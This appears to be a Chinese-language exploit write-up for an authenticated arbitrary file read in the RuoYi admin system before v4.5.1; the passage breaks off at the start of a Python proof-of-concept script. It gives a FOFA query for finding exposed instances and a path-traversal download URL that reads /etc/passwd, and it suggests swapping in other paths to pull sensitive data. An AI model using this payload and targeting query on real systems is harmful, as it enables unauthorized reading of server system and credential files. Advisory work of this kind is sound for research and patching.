# 若依(RuoYi)管理系统 后台任意文件读取
## 漏洞描述
若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件
## 漏洞影响
> [!NOTE]
>
> RuoYi < v4.5.1
## FOFA
> [!NOTE]
>
> app="若依-管理系统"
## 漏洞复现
登录后台后访问 Url
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd
访问后会下载文件 **/etc/passwd**
可以使用Burp抓包改变 **/etc/passwd** 为其他文件路径获取敏感信息
在新版本的修复中添加了过滤
## 漏洞利用POC
> [!NOTE]
>
> POC使用需要后台的Cookie,读取的文件路径应为根路径
```python
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0
